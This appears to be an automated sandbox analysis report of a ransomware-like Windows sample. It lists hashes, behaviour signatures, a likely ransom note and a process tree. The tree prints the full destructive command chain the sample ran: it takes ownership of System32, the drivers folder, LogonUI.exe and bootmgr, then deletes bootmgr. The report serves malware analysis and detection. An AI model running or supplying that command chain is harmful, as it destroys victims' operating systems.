Analysis

  • max time kernel
    0s
  • max time network
    113s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-12-2023 21:51

General

  • Target

    04df8dd30da8b5853f48cc1ac9b695a8.exe

  • Size

    6.1MB

  • MD5

    04df8dd30da8b5853f48cc1ac9b695a8

  • SHA1

    4c02262c2fea0e99277a99dcbe28a9c370b87c39

  • SHA256

    78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201

  • SHA512

    3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e

  • SSDEEP

    3072:jnsbblTAByHNgb0nbYlwKsw962CpJid72gqV/6c4LNobbamucc3OD4iEDzyEaE0u:jnsq7hQplBdJ7bP4L8rVE

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 7 IoCs
  • Modifies file permissions 1 TTPs 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe
    "C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Suspicious use of AdjustPrivilegeToken
    PID:2156
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit
      2⤵
        PID:1336
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\drivers /grant Admin:F
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:4064
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\drivers
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2680
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\LogonUI.exe /grant Admin:F
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3900
        • C:\Windows\system32\takeown.exe
          takeown /f C:\bootmgr
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1084
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\LogonUI.exe
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2492
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:984
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit
        2⤵
          PID:1808
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32 /grant Admin:F
        1⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3380
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32
        1⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2488
      • C:\Windows\system32\rundll32.exe
        rundll32 user32.dll,UpdatePerUserSystemParameters
        1⤵
          PID:2232

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml

          Filesize

          11KB

          MD5

          49d826b5b43094f6fd04739c6b709ca0

          SHA1

          a02d1ba89d7599472243279a5896139e86d754e3

          SHA256

          e62f9094b7f46d4a59bf47a6f6099387cb73f71b9924487e73f188e26c7303d6

          SHA512

          8a60272466f674f12ad7b63775e6f51f367d2ec80d9efce8345dfe3a44465ef476dbb334f2e7b49da5f6c32befc2bde62f94090c78df9189253474ddce4ffeb5

        • C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat

          Filesize

          8KB

          MD5

          ed890ebff57a837bcbee784b268a1d6d

          SHA1

          f2bd0792ca7b275bee7c4ec0b51193e19227dfb3

          SHA256

          1dde681e2814fb5c1babe5cddf4903462db829ce4735ea18bef0345bc0016ced

          SHA512

          3ff5e65b3927bffdc8d940c0739a7628541d8d2a565d3daa941c1deed06b6b4a8e2fd0454d9ad96fcf48d390bdd1ffc835dba7cfea63e5838d17db03973d0b65

        • C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20231215_111740966.html

          Filesize

          37KB

          MD5

          354af3836d13dc27e65beb7fe917aaff

          SHA1

          2ca4375e7161228f5d54bd94fcd6bddb83a647c4

          SHA256

          788ecbbbf85c87889f3c2279922021247ffee188b7d89d92765c6f2104180397

          SHA512

          b6a029ea67d731b0d565669109c0c230e20c423f873d983d5343bf1af296513cdc814a3b3726d407b1b14876b0d5448e1139ac25a92e5da46b596519a4193fc0

        • memory/2156-326-0x000000001B5A0000-0x000000001B749000-memory.dmp

          Filesize

          1.7MB

        • memory/2156-622-0x00007FFC51750000-0x00007FFC52211000-memory.dmp

          Filesize

          10.8MB

        • memory/2156-2-0x000000001B450000-0x000000001B460000-memory.dmp

          Filesize

          64KB

        • memory/2156-695-0x000000001B450000-0x000000001B460000-memory.dmp

          Filesize

          64KB

        • memory/2156-1-0x00007FFC51750000-0x00007FFC52211000-memory.dmp

          Filesize

          10.8MB

        • memory/2156-0-0x00000000002C0000-0x00000000008E0000-memory.dmp

          Filesize

          6.1MB

        • memory/2156-1138-0x000000001B450000-0x000000001B460000-memory.dmp

          Filesize

          64KB

        • memory/2156-1140-0x000000001B450000-0x000000001B460000-memory.dmp

          Filesize

          64KB

        • memory/2156-1143-0x000000001B450000-0x000000001B460000-memory.dmp

          Filesize

          64KB